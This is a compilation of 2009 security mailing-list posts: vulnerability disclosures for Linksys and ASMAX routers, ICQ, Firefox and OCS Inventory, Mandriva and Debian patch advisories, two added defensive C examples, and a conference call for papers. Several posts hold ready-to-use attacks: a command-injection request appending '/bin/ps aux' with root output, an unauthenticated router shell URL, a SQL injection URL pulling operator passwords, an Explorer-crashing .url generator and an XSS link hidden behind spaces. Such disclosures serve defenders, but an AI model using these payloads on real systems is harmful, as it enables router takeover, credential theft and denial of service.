Linksys WAG54G2 Web Management Console Local Arbitrary Shell Command Injection Vulnerability
1. Linksys WAG54G2 router is a popular SOHO class device. It provides ADSL / WiFi / Ethernet interfaces.

2. When logged into the web management console, it is possible to execute commands as root (tested on firmware: V1.00.10).

3. PoC:

GET /setup.cgi?ping_ipaddr1=1&ping_ipaddr2=1&ping_ipaddr3=1&ping_ipaddr4=1&ping_size=60&ping_number=1&ping_interval=1000&ping_timeout=5000&start=Start+Test&todo=ping_test&this_file=Diagnostics.htm&next_file=Diagnostics.htm&c4_ping_ipaddr=1.1.1.1;/bin/ps aux&message= HTTP/1.1
Host: 192.168.1.1
Authorization: Basic YWRtaW46YWRtaW4=

HTTP/1.0 200 OK
sh: cannot create 1: Unknown error 30
killall: pingmultilang: no process killed
killall: 2: no process killed
  PID  Uid     VmSize Stat Command
    1 root        284 S   init
    2 root            SWN [ksoftirqd/0]
    3 root            SW  [events/0]
    4 root            SW  [khelper]
    5 root            SW  [kthread]
...

4. Note that a valid user/password needs to be supplied (Authorization HTTP header).

5. One could try to exploit this issue remotely (using CSRF), assuming that the victim did not change the default password of the web management console.

6. The vendor (Cisco) was contacted in March '09 and confirmed the issue (but it still remains unpatched).

7. More detailed information: http://www.securitum.pl/dh/Linksys_WAG54G2_-_escape_to_OS_root
ICQ 6.5 URL Search Hook/ICQToolBar.dll .URL file processing Windows Explorer remote buffer overflow poc
<?php
/*
ICQ 6.5 URL Search Hook/ICQToolBar.dll .URL file processing Windows Explorer remote buffer overflow poc
by Nine:Situations:Group::pyrokinesis
site: http://retrogod.altervista.org/

If the resulting file is placed on the desktop, against ex. xp sp3 process explorer.exe will exit with code 1282 (0x502), that is ERROR_STACK_BUFFER_OVERRUN, and crash infinitely; you cannot even browse a folder if the file is present in it.

Solution: disable the shell extension; you may try shellexview by nirsoft.

Note (added 30/05/2009, remote vector added): it works with network folders too ... against a win2k3 where explorer.exe is not patched with /GS flag:

(f44.104): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=02100068 ebx=772a23c1 ecx=0210cefa edx=0823 esi=00610061 edi=
eip=772a533f esp=0210cec0 ebp=0210cec4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010202
SHLWAPI!Ordinal400+0x2d:
772a533f 668906 mov word ptr [esi],ax ds:0023:00610061= -
0:010> g
(f44.104): Access violation - code c005 (!!! second chance !!!)
eax=02100068 ebx=772a23c1 ecx=0210cefa edx=0823 esi=00610061 edi=
eip=772a533f esp=0210cec0 ebp=0210cec4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010202
SHLWAPI!Ordinal400+0x2d:
772a533f 668906 mov word ptr [esi],ax ds:0023:00610061= -
0:010> gn
eax=0001 ebx= ecx= edx= esi= edi=0001
eip=7ffe0304 esp=0178fcf0 ebp=0178ff44 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=0246
SharedUserData!SystemCallStub+0x4:
7ffe0304 c3 ret

prepare a network folder with the .url file inside. This works against Internet Explorer too by a hyperlink to the network folder
*/

// Build a minimal .url (InternetShortcut) file whose URL= value is 2184 'a' bytes.
$x = "[InternetShortcut]\x0d\x0a" . "URL=" . str_repeat("\x61", 2184);
file_put_contents("9sg_poc.url", $x);
?>

#original url: http://retrogod.altervista.org/9sg_icq_dos.html
[ MDVSA-2009:125 ] wireshark
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Mandriva Linux Security Advisory                         MDVSA-2009:125
http://www.mandriva.com/security/

Package : wireshark
Date    : May 31, 2009
Affected: 2008.1, 2009.0, 2009.1, Corporate 4.0

Problem Description:

A vulnerability has been identified and corrected in wireshark:

o Unspecified vulnerability in the PCNFSD dissector in Wireshark 0.8.20 through 1.0.7 allows remote attackers to cause a denial of service (crash) via crafted PCNFSD packets (CVE-2009-1829).

This update provides Wireshark 1.0.8, which is not vulnerable to this issue.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1829
http://www.wireshark.org/security/wnpa-sec-2009-03.html

Updated Packages:

Mandriva Linux 2008.1:
a0d083f369bffd3dfa46aa1df793ced1  2008.1/i586/dumpcap-1.0.8-3.1mdv2008.1.i586.rpm
556318aacdfd7d48ad44a7191092acd6  2008.1/i586/libwireshark0-1.0.8-3.1mdv2008.1.i586.rpm
861b059fa767f485833ad7192ac5ca2c  2008.1/i586/libwireshark-devel-1.0.8-3.1mdv2008.1.i586.rpm
8c2b35c5dfd76a22eb346e42bbb34155  2008.1/i586/rawshark-1.0.8-3.1mdv2008.1.i586.rpm
348c0c15f2e855b4c7a0348d34ea09fe  2008.1/i586/tshark-1.0.8-3.1mdv2008.1.i586.rpm
6cdb4bcd35b66c7e7a22015335dd292f  2008.1/i586/wireshark-1.0.8-3.1mdv2008.1.i586.rpm
13b1982a9621bdc39d4d97afc45b8cd5  2008.1/i586/wireshark-tools-1.0.8-3.1mdv2008.1.i586.rpm
764d085469658662ac2911fa64ff3ddd  2008.1/SRPMS/wireshark-1.0.8-3.1mdv2008.1.src.rpm

Mandriva Linux 2008.1/X86_64:
f81a7484841903392600faaf424c9b0f  2008.1/x86_64/dumpcap-1.0.8-3.1mdv2008.1.x86_64.rpm
4f702d98ddc5c0c856737c3c8218120a  2008.1/x86_64/lib64wireshark0-1.0.8-3.1mdv2008.1.x86_64.rpm
ba6fb67f3106d9e11d28c29c925bb79a  2008.1/x86_64/lib64wireshark-devel-1.0.8-3.1mdv2008.1.x86_64.rpm
b5017da51fd24e944f30753ff799a7dd  2008.1/x86_64/rawshark-1.0.8-3.1mdv2008.1.x86_64.rpm
5ea24ffef5972d5080cb986d0b7f8aa7  2008.1/x86_64/tshark-1.0.8-3.1mdv2008.1.x86_64.rpm
83d8494632a64f4184cad21f0ff2070a  2008.1/x86_64/wireshark-1.0.8-3.1mdv2008.1.x86_64.rpm
e446d9a365b467d17b829f156f88bcad  2008.1/x86_64/wireshark-tools-1.0.8-3.1mdv2008.1.x86_64.rpm
764d085469658662ac2911fa64ff3ddd  2008.1/SRPMS/wireshark-1.0.8-3.1mdv2008.1.src.rpm

Mandriva Linux 2009.0:
c601d5a72e97b879878a3d94d6b07682  2009.0/i586/dumpcap-1.0.8-3.1mdv2009.0.i586.rpm
cbc6e9bfe4055a4e3a486ad7d9d5d1d6  2009.0/i586/libwireshark0-1.0.8-3.1mdv2009.0.i586.rpm
7e15d3c389aec169bba4cbc3ca3e743e  2009.0/i586/libwireshark-devel-1.0.8-3.1mdv2009.0.i586.rpm
8b54b7755dc4c23d5c5aabce2cc8c93b  2009.0/i586/rawshark-1.0.8-3.1mdv2009.0.i586.rpm
4747a553908057b86c042759f78976ea  2009.0/i586/tshark-1.0.8-3.1mdv2009.0.i586.rpm
736173032c8f0dc38f358196f092429b  2009.0/i586/wireshark-1.0.8-3.1mdv2009.0.i586.rpm
e8aa27a3ca2cf82599fc4c84044ff5ba  2009.0/i586/wireshark-tools-1.0.8-3.1mdv2009.0.i586.rpm
2bae0ecb6b260cfe69f81afbcfe7ecb3  2009.0/SRPMS/wireshark-1.0.8-3.1mdv2009.0.src.rpm

Mandriva Linux 2009.0/X86_64:
7878ec348dd2a4543d6704acf6847bf1  2009.0/x86_64/dumpcap-1.0.8-3.1mdv2009.0.x86_64.rpm
5bf724ce33c315dda9d419132cb5c3f7  2009.0/x86_64/lib64wireshark0-1.0.8-3.1mdv2009.0.x86_64.rpm
003c4fc644bbd55a5387a5840f071c2d  2009.0/x86_64/lib64wireshark-devel-1.0.8-3.1mdv2009.0.x86_64.rpm
bfe8072577a4ec90e189bdcf9c595347  2009.0/x86_64/rawshark-1.0.8-3.1mdv2009.0.x86_64.rpm
bdc71f63874e7d26bb38d2c0bb9e3704  2009.0/x86_64/tshark-1.0.8-3.1mdv2009.0.x86_64.rpm
ebeff9070be842e8f76d197fcd9ab63d  2009.0/x86_64/wireshark-1.0.8-3.1mdv2009.0.x86_64.rpm
87471e79b554ed396eafc35e38018cfe  2009.0/x86_64/wireshark-tools-1.0.8-3.1mdv2009.0.x86_64.rpm
2bae0ecb6b260cfe69f81afbcfe7ecb3  2009.0/SRPMS/wireshark-1.0.8-3.1mdv2009.0.src.rpm

Mandriva Linux 2009.1:
e78195d23cfe382e968c7d2c06640c0d  2009.1/i586/dumpcap-1.0.8-3mdv2009.1.i586.rpm
28f331ffb584965eaf6007c5e7cf1256  2009.1/i586/libwireshark0-1.0.8-3mdv2009.1.i586.rpm
d274ad81b779b568d29935701123c5fd  2009.1/i586/libwireshark-devel-1.0.8-3mdv2009.1.i586.rpm
dab42aa9f71d2f6f0027cd535a88212b  2009.1/i586/rawshark-1.0.8-3mdv2009.1.i586.rpm
7ed28537628436176c78efb085e83629  2009.1/i586/tshark-1.0.8-3mdv2009.1.i586.rpm
b493d446f0167ccd9c1aed81f64b14c7  2009.1/i586/wireshark-1.0.8-3mdv2009.1.i586.rpm
9edec3502b5a361ecbcdd03000d14689  2009.1/i586/wireshark-tools-1.0.8-3mdv2009.1.i586.rpm
461b4a5ca1fd68d46e6d9456284c39e7  2009.1/SRPMS/wireshark-1.0.8-3mdv2009.1.src.rpm

Mandriva Linux 2009.1/X86_64:
02025763727e6c694ea55db8c3fd754d  2009.1/x86_64/dumpcap-1.0.8-3mdv2009.1.x86_64.rpm
b33f175e526d24e581cbeffc1ece9371
FIREFOX URL space character SPOOF
Vulnerability:
==

When the Firefox browser address bar and status bar deal with a URL containing the space character, there is no reasonable encoding of the URL. Malicious code placed behind the blank characters will be hidden. An attacker can construct a URL with a long run of spaces to deceive the user.

Exploit:
==

If another site has an XSS vulnerability, such as:

<a href='http://127.0.0.1/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%22%3E%3C%73%63%72%69%70%74%3E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%67%2E%63%6E%27%3C%2F%73%63%72%69%70%74%3E'>test</a>

http://127.0.0.1 is the site which has the XSS. When you put the code above into a file, save it as an HTML file and then open it, you can see that in the Firefox status bar the malicious code has been hidden because of the spaces. While this is convenient for users to view, the spaces are shielding the user's eyes. I think the Firefox status bar and address bar should URL-encode the space when handling it. While focusing on convenience, one should also focus on safety.

===
xisigr[topsec]
xis...@gmail.com
[SECURITY] [DSA 1807-1] New cyrus-sasl2/cyrus-sasl2-heimdal packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA-1807-1                   secur...@debian.org
http://www.debian.org/security/                               Nico Golde
June 1st, 2009                         http://www.debian.org/security/faq
- --

Package        : cyrus-sasl2, cyrus-sasl2-heimdal
Vulnerability  : buffer overflow
Problem type   : remote
Debian-specific: no
Debian bug     : 528749
CERT advisory  : VU#238019
CVE ID         : CVE-2009-0688

James Ralston discovered that the sasl_encode64() function of cyrus-sasl2, a free library implementing the Simple Authentication and Security Layer, suffers from a missing null termination in certain situations. This causes several buffer overflows in situations where cyrus-sasl2 itself requires the string to be null terminated, which can lead to denial of service or arbitrary code execution.

Important notice (quoting from US-CERT):

While this patch will fix currently vulnerable code, it can cause non-vulnerable existing code to break. Here's a function prototype from include/saslutil.h to clarify my explanation:

/* base64 encode
 *  in      -- input data
 *  inlen   -- input data length
 *  out     -- output buffer (will be NUL terminated)
 *  outmax  -- max size of output buffer
 * result:
 *  outlen  -- gets actual length of output buffer (optional)
 *
 * Returns SASL_OK on success, SASL_BUFOVER if result won't fit
 */
LIBSASL_API int sasl_encode64(const char *in, unsigned inlen,
                              char *out, unsigned outmax,
                              unsigned *outlen);

Assume a scenario where calling code has been written in such a way that it calculates the exact size required for base64 encoding in advance, then allocates a buffer of that exact size, passing a pointer to the buffer into sasl_encode64() as *out. As long as this code does not anticipate that the buffer is NUL-terminated (does not call any string-handling functions like strlen(), for example) the code will work and it will not be vulnerable. Once this patch is applied, that same code will break because sasl_encode64() will begin to return SASL_BUFOVER.

For the oldstable distribution (etch), this problem will be fixed soon.

For the stable distribution (lenny), this problem has been fixed in version 2.1.22.dfsg1-23+lenny1 of cyrus-sasl2 and cyrus-sasl2-heimdal.

For the testing distribution (squeeze), this problem will be fixed soon.

For the unstable distribution (sid), this problem has been fixed in version 2.1.23.dfsg1-1 of cyrus-sasl2 and cyrus-sasl2-heimdal.

We recommend that you upgrade your cyrus-sasl2/cyrus-sasl2-heimdal packages.

Upgrade instructions
- --

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 5.0 alias lenny
- ---

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

http://security.debian.org/pool/updates/main/c/cyrus-sasl2-heimdal/cyrus-sasl2-heimdal_2.1.22.dfsg1-23+lenny1.dsc
    Size/MD5 checksum:    1775 510a3befa02a034758711c4bf329082e
http://security.debian.org/pool/updates/main/c/cyrus-sasl2/cyrus-sasl2_2.1.22.dfsg1-23+lenny1.diff.gz
    Size/MD5 checksum:   76458 85b876ee4b8d33a804f1164d727a5281
http://security.debian.org/pool/updates/main/c/cyrus-sasl2/cyrus-sasl2_2.1.22.dfsg1-23+lenny1.dsc
    Size/MD5 checksum:    1930 6939422cb0ce3455ce5a1a494692fd68
http://security.debian.org/pool/updates/main/c/cyrus-sasl2/cyrus-sasl2_2.1.22.dfsg1.orig.tar.gz
    Size/MD5 checksum: 1370731 f196299b2c07f822c8c56db71b7dc7db
http://security.debian.org/pool/updates/main/c/cyrus-sasl2-heimdal/cyrus-sasl2-heimdal_2.1.22.dfsg1.orig.tar.gz
    Size/MD5 checksum: 1370731 f196299b2c07f822c8c56db71b7dc7db
http://security.debian.org/pool/updates/main/c/cyrus-sasl2-heimdal/cyrus-sasl2-heimdal_2.1.22.dfsg1-23+lenny1.diff.gz
    Size/MD5 checksum:   27834 dae4de4ce221e8d5f9ca9fbc8376f1ba

Architecture independent packages:

http://security.debian.org/pool/updates/main/c/cyrus-sasl2/cyrus-sasl2-doc_2.1.22.dfsg1-23+lenny1_all.deb
    Size/MD5 checksum:  104228 c5b2a9dac2683208cbc7fe0aeaf9e276

alpha architecture (DEC Alpha)

http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-otp_2.1.22.dfsg1-23+lenny1_alpha.deb
    Size/MD5 checksum:   84954 9d18b6afabcdb581ba692b0de7abc489
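The US-CERT note above turns on one arithmetic detail: a base64 buffer must hold 4 characters per 3 input bytes plus one byte for the NUL that the fixed sasl_encode64() now writes. The following is an added example, not cyrus-sasl's code: a stand-alone encoder with the same contract (always NUL-terminates, refuses with a BUFOVER-style error when text plus terminator will not fit), next to the two caller patterns the advisory contrasts. The names demo_encode64, demo_encode64_bufsize, DEMO_OK and DEMO_BUFOVER are my own stand-ins for the library's; the real constants live in sasl.h.

```c
/* Added example (not cyrus-sasl code): a base64 encoder with the post-fix
 * sasl_encode64() contract, showing why callers must budget for the NUL. */
#include <stdio.h>
#include <string.h>

#define DEMO_OK      0      /* stand-in for SASL_OK */
#define DEMO_BUFOVER (-3)   /* stand-in for SASL_BUFOVER */

static const char b64tab[] =
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

/* Size a caller must allocate for inlen input bytes: four characters per
 * three-byte group (rounded up) plus one byte for the terminating NUL. */
unsigned demo_encode64_bufsize(unsigned inlen)
{
    return 4 * ((inlen + 2) / 3) + 1;
}

/* Encode in[0..inlen) into out, NUL-terminating the result.  Fails without
 * touching out when outmax cannot hold the text and the terminator. */
int demo_encode64(const char *in, unsigned inlen,
                  char *out, unsigned outmax, unsigned *outlen)
{
    unsigned need = demo_encode64_bufsize(inlen);
    unsigned i = 0, o = 0;

    if (outmax < need)
        return DEMO_BUFOVER;

    for (; i + 2 < inlen; i += 3) {            /* full 3-byte groups */
        unsigned char a = in[i], b = in[i + 1], c = in[i + 2];
        out[o++] = b64tab[a >> 2];
        out[o++] = b64tab[((a & 3) << 4) | (b >> 4)];
        out[o++] = b64tab[((b & 15) << 2) | (c >> 6)];
        out[o++] = b64tab[c & 63];
    }
    if (i < inlen) {                            /* 1 or 2 trailing bytes */
        unsigned char a = in[i];
        unsigned char b = (i + 1 < inlen) ? (unsigned char)in[i + 1] : 0;
        out[o++] = b64tab[a >> 2];
        out[o++] = b64tab[((a & 3) << 4) | (b >> 4)];
        out[o++] = (i + 1 < inlen) ? b64tab[(b & 15) << 2] : '=';
        out[o++] = '=';
    }
    out[o] = '\0';                              /* the byte the old code skipped */
    if (outlen)
        *outlen = o;
    return DEMO_OK;
}

/* The caller pattern the advisory warns about: a buffer sized for the
 * encoded text only.  Correct before the fix, BUFOVER after it. */
int demo_call_exact_size(const char *in, unsigned inlen)
{
    char buf[64];
    unsigned exact = 4 * ((inlen + 2) / 3);    /* no room for the NUL */
    if (demo_encode64_bufsize(inlen) > sizeof buf)
        return DEMO_BUFOVER;
    return demo_encode64(in, inlen, buf, exact, NULL);
}

/* The corrected caller: one extra byte for the terminator. */
int demo_call_with_nul(const char *in, unsigned inlen)
{
    char buf[64];
    if (demo_encode64_bufsize(inlen) > sizeof buf)
        return DEMO_BUFOVER;
    return demo_encode64(in, inlen, buf, demo_encode64_bufsize(inlen), NULL);
}

/* Helper for checking: encode in and compare with expected; 1 on match. */
int demo_encodes_to(const char *in, unsigned inlen, const char *expected)
{
    char buf[64];
    unsigned n = 0;
    if (demo_encode64_bufsize(inlen) > sizeof buf)
        return 0;
    if (demo_encode64(in, inlen, buf, sizeof buf, &n) != DEMO_OK)
        return 0;
    return n == strlen(expected) && strcmp(buf, expected) == 0;
}

int main(void)
{
    /* Constructed input: the RFC 4648 test string "foob". */
    printf("exact-size caller: %d, with-NUL caller: %d\n",
           demo_call_exact_size("foob", 4), demo_call_with_nul("foob", 4));
    return 0;
}
```

Running it prints -3 for the exact-size caller and 0 for the corrected one, which is the behaviour change the advisory describes: code that never read the buffer as a C string worked before the patch and starts failing after it, and the fix on the caller's side is one byte.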
[ MDVSA-2009:124 ] apache
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Mandriva Linux Security Advisory                         MDVSA-2009:124
http://www.mandriva.com/security/

Package : apache
Date    : May 31, 2009
Affected: 2008.1, 2009.0, 2009.1, Corporate 4.0

Problem Description:

Multiple vulnerabilities have been found and corrected in apache:

Memory leak in the zlib_stateful_init function in crypto/comp/c_zlib.c in libssl in OpenSSL 0.9.8f through 0.9.8h allows remote attackers to cause a denial of service (memory consumption) via multiple calls, as demonstrated by initial SSL client handshakes to the Apache HTTP Server mod_ssl that specify a compression algorithm (CVE-2008-1678). Note that this security issue does not really apply, as zlib compression is not enabled in the openssl build provided by Mandriva, but apache is patched to address this issue anyway (concerns 2008.1 only).

Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apache 2.0.63 and earlier, and mod_proxy_ftp.c in the mod_proxy_ftp module in Apache 2.2.9 and earlier 2.2 versions, allows remote attackers to inject arbitrary web script or HTML via wildcards in a pathname in an FTP URI (CVE-2008-2939). Note that this security issue was initially addressed with MDVSA-2008:195, but the patch fixing the issue was added but not applied in 2009.0.

The Apache HTTP Server 2.2.11 and earlier 2.2 versions do not properly handle Options=IncludesNOEXEC in the AllowOverride directive, which allows local users to gain privileges by configuring (1) Options Includes, (2) Options +Includes, or (3) Options +IncludesNOEXEC in a .htaccess file, and then inserting an exec element in a .shtml file (CVE-2009-1195).

This update provides fixes for these vulnerabilities.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1678
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2939
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1195

Updated Packages:

Mandriva Linux 2008.1:
7ec559d730fe009bdf1e4a78acd0d826  2008.1/i586/apache-base-2.2.8-6.2mdv2008.1.i586.rpm
52e9047dd9922fb706e1ae661ffec647  2008.1/i586/apache-devel-2.2.8-6.2mdv2008.1.i586.rpm
057298a3f2fd895fc341925ef1f68851  2008.1/i586/apache-htcacheclean-2.2.8-6.2mdv2008.1.i586.rpm
171068e2dfc51397c07a9d3fd548f1b6  2008.1/i586/apache-mod_authn_dbd-2.2.8-6.2mdv2008.1.i586.rpm
822918ddb258642c9213d338b98c14fb  2008.1/i586/apache-mod_cache-2.2.8-6.2mdv2008.1.i586.rpm
8a2b046526ebe44fd849a9e9858e0494  2008.1/i586/apache-mod_dav-2.2.8-6.2mdv2008.1.i586.rpm
23bbfb62795eff6c23ef689a2193fb8f  2008.1/i586/apache-mod_dbd-2.2.8-6.2mdv2008.1.i586.rpm
2189ba0bfee1364eb4416418db4258e1  2008.1/i586/apache-mod_deflate-2.2.8-6.2mdv2008.1.i586.rpm
2c5506127b9b3caa25910bcf6d5953cc  2008.1/i586/apache-mod_disk_cache-2.2.8-6.2mdv2008.1.i586.rpm
63492ccf2e9a89ff791f491f99bfc23c  2008.1/i586/apache-mod_file_cache-2.2.8-6.2mdv2008.1.i586.rpm
38e9f510daf9bf904f1f9b8471030650  2008.1/i586/apache-mod_ldap-2.2.8-6.2mdv2008.1.i586.rpm
37ed8ed4614e45e2188b6d714c8530ed  2008.1/i586/apache-mod_mem_cache-2.2.8-6.2mdv2008.1.i586.rpm
f083445d93d7e8f0035b10777234ef38  2008.1/i586/apache-mod_proxy-2.2.8-6.2mdv2008.1.i586.rpm
7ecc1ff5e58835c0323626116c93725d  2008.1/i586/apache-mod_proxy_ajp-2.2.8-6.2mdv2008.1.i586.rpm
9cf62f5b52508dedb470f9b980d6d4d5  2008.1/i586/apache-mod_ssl-2.2.8-6.2mdv2008.1.i586.rpm
b378b2b4103f5876ce746233173278e5  2008.1/i586/apache-modules-2.2.8-6.2mdv2008.1.i586.rpm
c78663fdace7ec31eeae3e9a0c01619a  2008.1/i586/apache-mod_userdir-2.2.8-6.2mdv2008.1.i586.rpm
cc2281cf44d7271cf507071c65d46309  2008.1/i586/apache-mpm-event-2.2.8-6.2mdv2008.1.i586.rpm
8161574d6883d29318276b974a3bd95d  2008.1/i586/apache-mpm-itk-2.2.8-6.2mdv2008.1.i586.rpm
59a4bfb20f243d274f6d3267dd8621cb  2008.1/i586/apache-mpm-prefork-2.2.8-6.2mdv2008.1.i586.rpm
cc2f58f832848ace53b18fbfb272fb83  2008.1/i586/apache-mpm-worker-2.2.8-6.2mdv2008.1.i586.rpm
86b2fe589d35fd6821d5994b0efa0aa2  2008.1/i586/apache-source-2.2.8-6.2mdv2008.1.i586.rpm
390895e36f7c0863501a429d6583ee02  2008.1/SRPMS/apache-2.2.8-6.2mdv2008.1.src.rpm

Mandriva Linux 2008.1/X86_64:
520bd0c278ebae63de0f4479da178124  2008.1/x86_64/apache-base-2.2.8-6.2mdv2008.1.x86_64.rpm
e254c98a6796b826f09eea2fab69170f  2008.1/x86_64/apache-devel-2.2.8-6.2mdv2008.1.x86_64.rpm
26d424de3c58a585a266533ee9fe3718  2008.1/x86_64/apache-htcacheclean-2.2.8-6.2mdv2008.1.x86_64.rpm
d95d814fc660560124428cd0c8093611  2008.1/x86_64/apache-mod_authn_dbd-2.2.8-6.2mdv2008.1.x86_64.rpm
OCS Inventory NG 1.02 - Multiple SQL Injections
OCS Inventory NG - Multiple SQL Injections (May 30 2009)

* Product
Open Computer and Software (OCS) Inventory NG (http://www.ocsinventory-ng.org/)

* Vulnerable Versions
OCS Inventory NG 1.02 (Unix)

* Vendor Status
Vendor has been notified and the vulnerability has been fixed.

* Details
The Open Computer and Software (OCS) Inventory Next Generation (NG) provides relevant inventory information about system configurations and software on the network. The server can be managed using a web interface. It was found that the application does not properly sanitize user input, which results in multiple SQL injections. Affected are the following scripts:
- download.php (parameters `N', `DL', `O' and `V')
- group_show.php (parameter `SYSTEMID')

* Impact
Attackers may be able to manipulate SQL statements in such a way that they can retrieve, create or modify information stored in the database. Furthermore, the SQL injection might allow attackers to get a foothold on the underlying system.

* Exploit
The vulnerability can be exploited by just using a web browser:
http://example.org/ocsreports/download.php?n=1&dl=2&o=3&v=4'union+all+select+concat(id,':',passwd)+from+operators%23

http://www.leidecker.info/advisories/2009-05-30-ocs_inventory_ng_sql_injection.shtml

Nico Leidecker - http://www.leidecker.info
ASMAX AR 804 gu Web Management Console Arbitrary Shell Command Injection Vulnerability
1. ASMAX 804 gu router is a SOHO class device. It provides ADSL / WiFi / Ethernet interfaces.

2. There is an *unauthenticated* maintenance script (named 'script') in the /cgi-bin/ directory of the web management interface.

3. When the 'system' parameter is passed to the script, it allows running OS shell commands (as root).

4. PoC: GET request to: http://192.168.1.1/cgi-bin/script?system%20whoami
   Returns: root

5. Using a CSRF attack one could remotely own the router, using for example simple img html tags pointing to http://192.168.1.1/...

6. The issue was tested on firmware: 66.34.1

7. The vendor was notified on 30.12.08, but we got no reasonable response till now (the bug remains unpatched).

8. More information: http://www.securitum.pl/dh/asmax-ar-804-gu-compromise
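The two router advisories above (Linksys WAG54G2 and ASMAX AR 804 gu) describe the same defect in a CGI diagnostics handler: a request parameter reaches a shell, so "1.1.1.1;/bin/ps aux" runs a second command. The following C code is an added example, not firmware from either vendor, of how such a handler can be written so that the parameter never reaches a shell at all: it is accepted only as a strict dotted-quad IPv4 literal and handed to ping as one argv element via execvp(). It assumes a ping binary on PATH; is_ipv4_literal and run_ping are my own names.

```c
/* Added example (not vendor code): a hardened "ping test" CGI handler.
 * The target is validated as a strict IPv4 literal and passed to ping as a
 * separate argv element, so no shell ever parses it. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Return 1 if s is exactly four decimal octets 0..255 joined by dots.
 * Anything else, including a trailing ';' or space, is rejected. */
int is_ipv4_literal(const char *s)
{
    int octets = 0;
    if (s == NULL || *s == '\0')
        return 0;
    while (*s != '\0') {
        int digits = 0, value = 0;
        while (isdigit((unsigned char)*s)) {
            value = value * 10 + (*s - '0');
            if (++digits > 3 || value > 255)
                return 0;
            s++;
        }
        if (digits == 0)            /* empty octet, e.g. "1..1.1" */
            return 0;
        octets++;
        if (*s == '.') {
            if (octets == 4)        /* a fifth octet would follow */
                return 0;
            s++;
        } else if (*s != '\0') {    /* ';', space, anything else: reject */
            return 0;
        }
    }
    return octets == 4;
}

/* Run "ping -c <count> <target>" without a shell.  Returns ping's exit
 * status, or -1 if the target was rejected or the process could not run.
 * The firmware pattern the advisories describe instead builds one command
 * string from the parameter and hands it to a shell, which is what lets a
 * ';' in the parameter start a second command. */
int run_ping(const char *target, int count)
{
    char count_str[16];
    pid_t pid;
    int status;

    if (!is_ipv4_literal(target) || count < 1 || count > 10)
        return -1;                  /* refuse before anything is spawned */
    snprintf(count_str, sizeof count_str, "%d", count);

    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* argv elements reach ping verbatim: no word splitting, no
         * metacharacter interpretation. */
        char *const argv[] = { "ping", "-c", count_str, (char *)target, NULL };
        execvp("ping", argv);
        _exit(127);                 /* only reached if exec itself failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed inputs: a legitimate target, the injected form from the
     * Linksys advisory, and an out-of-range octet. */
    const char *inputs[] = { "192.168.1.1", "1.1.1.1;/bin/ps aux", "256.1.1.1" };
    size_t i;
    for (i = 0; i < sizeof inputs / sizeof inputs[0]; i++)
        printf("%-24s -> %s\n", inputs[i],
               is_ipv4_literal(inputs[i]) ? "accepted" : "rejected");
    return 0;
}
```

The validator is deliberately an allow-list rather than a blacklist of shell metacharacters: the diagnostics page only ever needs an address, so anything that is not one is rejected, and the argv-based exec means that even a validator bug could not turn the parameter into a command. The ASMAX case additionally needs the handler to require authentication, which is outside this snippet.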
CFP 26C3 / 26th Chaos Communication Congress
26C3: Here Be Dragons
26th Chaos Communication Congress
December 27th to 30th, 2009
Berlin, Germany
http://events.ccc.de/congress/2009/

Overview
========

26C3 is the annual four-day conference organized by the Chaos Computer Club (CCC) in Berlin, Germany. First held in 1984, it has since established itself as the European Hacker Conference, attracting a diverse audience of thousands of hackers, scientists, artists, and utopists from all around the world. We want you to join and be a part of this unique event, which serves as a public platform for cross-culture inspiration and borderless networking. 26C3 is fun!

Topics
======

The 26C3 conference program is roughly divided into six general categories. These categories serve as guidelines for your submissions (and later as a means of orientation for your prospective audience). However, it is not mandatory for your talk to exactly match the descriptions below. Anything that is interesting and/or funny will be taken into consideration.

Society
-------

